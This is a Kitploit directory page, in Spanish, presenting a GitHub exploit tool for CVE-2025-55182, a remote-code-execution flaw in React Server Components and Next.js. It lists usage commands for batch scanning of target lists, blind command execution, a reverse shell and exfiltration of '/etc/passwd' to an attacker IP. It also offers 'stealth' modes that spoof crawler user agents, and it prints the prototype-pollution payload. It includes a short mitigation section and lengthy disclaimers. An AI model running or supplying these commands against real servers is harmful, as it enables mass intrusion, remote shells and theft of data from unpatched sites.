Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 Herramienta de Exploit de Ejecución Remota de Código en React Server Components | Kitploit
Herramientas/GitHubGitHub/spritualkb/cve-2025-55182-exp
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 Herramienta de Exploit de Ejecución Remota de Código en React Server Components

46123hace 9 mesesRevisado por Kitploit
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182-exp

CVE Type Python License

🔥 Descripción general

CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código (RCE) en React Server Components (RSC) que afecta a las aplicaciones Next.js que utilizan App Router con Server Actions.

La vulnerabilidad reside en el proceso de deserialización del protocolo Flight, lo que permite a los atacantes lograr la ejecución arbitraria de código mediante la contaminación de prototipos (prototype pollution).

⚠️ Descargo de responsabilidad / 免责声明

SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Cualquier uso ilegal o no autorizado de esta herramienta es responsabilidad exclusiva del usuario. El autor no asume responsabilidad alguna.

本工具仅供授权安全测试和教育目的使用。如有任何违规、非法操作,一切后果由使用者自行承担,与本人无关。

Lea el DISCLAIMER.md completo antes de utilizar esta herramienta.

Al utilizar esta herramienta, usted acepta que:

  • Ha obtenido la autorización adecuada para cualquier prueba
  • Cumplirá con todas las leyes y regulaciones aplicables
  • Acepta la plena responsabilidad por sus acciones
  • El autor no asume responsabilidad por ningún uso indebido

📋 Versiones afectadas

ComponenteVersiones afectadas
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 Uso

Comprobar un único objetivo

root@kitploit:~
python3 exploit.py http://target:3000 --check

Escaneo por lotes desde un archivo

root@kitploit:~
# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Ejecutar un comando (RCE ciego)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

Reverse shell

root@kitploit:~
# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Exfiltrar la salida del comando

root@kitploit:~
# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Uso de proxy

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Modos sigilosos

ModoDescripción
browserSimula solicitudes reales de navegador (predeterminado)
crawlerSimula rastreadores de motores de búsqueda (Googlebot, Baiduspider, etc.)
securityUtiliza User-Agents de escáneres de seguridad

🔧 Opciones

OpciónDescripción
targetURL del objetivo (p. ej., http://localhost:3000)
-f, --fileArchivo que contiene las URL de los objetivos (una por línea)
-o, --outputArchivo de salida para los objetivos vulnerables
-c, --commandComando a ejecutar (a ciegas)
--checkComprobar si hay vulnerabilidad
--proxyProxy SOCKS5 (p. ej., socks5://127.0.0.1:1080)
--stealthModo sigiloso: browser, crawler, security
--delayRetardo entre solicitudes en segundos
--variantsUsar múltiples variantes de payload para una comprobación exhaustiva
--revshell IP PORTReverse shell hacia IP:PUERTO
--exfil CMD IP PORTEjecutar CMD y enviar la salida mediante POST a IP:PUERTO
-t, --timeoutTiempo de espera de la solicitud en segundos (predeterminado: 15)

🔬 Detalles técnicos

Mecanismo de la vulnerabilidad

El exploit aprovecha la contaminación de prototipos (prototype pollution) en la deserialización del protocolo Flight:

  1. Contaminación de prototipos: Contamina Object.prototype.then mediante "$1:__proto__:then"
  2. Acceso al constructor de Function: Establece _formData.get en el constructor Function mediante "$1:constructor:constructor"
  3. Inyección de código: Inyecta código malicioso mediante _prefix, que se pasa a Function()

Estructura del payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Estructura de archivos

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 Formato de targets.txt

root@kitploit:~
# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Mitigación

  1. Actualice a las últimas versiones parcheadas de react-server-dom-webpack y Next.js
  2. Implemente la validación de entradas en Server Actions
  3. Use reglas de firewall de aplicaciones web (WAF) para detectar payloads maliciosos del protocolo Flight
  4. Supervise la aparición de errores inusuales del lado del servidor (HTTP 500) con mensajes relacionados con prototipos

📜 Licencia

Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.


⚠️ Descargo de responsabilidad legal / 法律免责声明

English

Términos de uso

Al descargar, copiar, instalar o utilizar este software, usted acepta quedar sujeto a los términos de este descargo de responsabilidad.

Propósito previsto

Esta herramienta está diseñada exclusivamente para:

  • Pruebas de penetración autorizadas
  • Investigación y educación en seguridad
  • Evaluación de vulnerabilidades con la autorización adecuada
  • Competiciones CTF (Capture The Flag)
  • Entornos de laboratorio personales

Uso prohibido

NO DEBERÁ utilizar esta herramienta para:

  • Acceso no autorizado a sistemas informáticos
  • Cualquier actividad ilegal
  • Atacar sistemas sin permiso escrito explícito
  • Causar daños a cualquier sistema o dato
  • Cualquier actividad que infrinja las leyes locales, estatales, nacionales o internacionales

Sin garantía

ESTE SOFTWARE SE PROPORCIONA «TAL CUAL», SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA. EL/LOS AUTOR(ES) RENUNCIAN A TODAS LAS GARANTÍAS, INCLUYENDO, ENTRE OTRAS:

  • COMERCIABILIDAD
  • IDONEIDAD PARA UN PROPÓSITO PARTICULAR
  • NO INFRACCIÓN

Limitación de responsabilidad

EN NINGÚN CASO EL/LOS AUTOR(ES) SERÁN RESPONSABLES DE:

  • Daños directos, indirectos, incidentales, especiales, ejemplares o consecuentes
  • Pérdida de datos, beneficios u oportunidades de negocio
  • Consecuencias legales derivadas del uso indebido de esta herramienta

Responsabilidad del usuario

El usuario asume toda la responsabilidad por:

  • Obtener la autorización adecuada antes de probar cualquier sistema
  • El cumplimiento de todas las leyes y regulaciones aplicables
  • Cualquier consecuencia derivada del uso de esta herramienta
  • Garantizar la legalidad de sus acciones en su jurisdicción

Reconocimiento

Al utilizar esta herramienta, usted reconoce que:

  1. Ha leído y comprendido este descargo de responsabilidad
  2. Utilizará esta herramienta únicamente para fines legales y autorizados
  3. Acepta todos los riesgos asociados con el uso de esta herramienta
  4. El/los autor(es) no asume(n) responsabilidad alguna por cualquier uso indebido

中文

使用条款

下载、复制、安装或使用本软件即表示您同意受本免责声明条款的约束。

预期用途

本工具仅用于:

  • 授权的渗透测试
  • 安全研究和教育
  • 经过适当授权的漏洞评估
  • CTF(夺旗赛)比赛
  • 个人实验室环境

禁止用途

您不得将本工具用于:

  • 未经授权访问计算机系统
  • 任何非法活动
  • 在没有明确书面许可的情况下攻击系统
  • 对任何系统或数据造成损害
  • 任何违反当地、州、国家或国际法律的活动

无担保声明

本软件按"原样"提供,不提供任何明示或暗示的担保。作者否认所有担保,包括但不限于:

  • 适销性
  • 特定用途的适用性
  • 非侵权性

责任限制

在任何情况下,作者均不对以下情况承担责任:

  • 直接、间接、附带、特殊、惩戒性或后果性损害
  • 数据、利润或商业机会的损失
  • 因滥用本工具而产生的法律后果

用户责任

用户对以下事项承担全部责任:

  • 在测试任何系统之前获得适当的授权
  • 遵守所有适用的法律法规
  • 使用本工具产生的任何后果
  • 确保其行为在其管辖范围内的合法性

确认声明

使用本工具即表示您确认:

  1. 您已阅读并理解本免责声明
  2. 您将仅将本工具用于合法和授权的目的
  3. 您接受与使用本工具相关的所有风险
  4. 作者对任何滥用行为不承担任何责任

法律参考 / Referencias legales

相关法律 / Leyes relevantes

  • 中国: 《中华人民共和国网络安全法》、《中华人民共和国刑法》第285条、第286条
  • EE. UU.: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • UE: Directiva 2013/40/UE sobre ataques contra los sistemas de información
  • Reino Unido: Computer Misuse Act 1990

授权测试要求 / Requisitos de autorización

在进行任何安全测试之前,您必须:

  1. 获得系统所有者的书面授权
  2. 明确定义测试范围和边界
  3. 遵守所有适用的法律法规
  4. 记录所有测试活动

Antes de realizar cualquier prueba de seguridad, debe:

  1. Obtener la autorización por escrito del propietario del sistema
  2. Definir claramente el alcance y los límites de las pruebas
  3. Cumplir con todas las leyes y regulaciones aplicables
  4. Documentar todas las actividades de prueba

⚠️ 未经授权的计算机访问是违法行为 ⚠️
⚠️ El acceso no autorizado a sistemas informáticos es un delito ⚠️

Descargar herramienta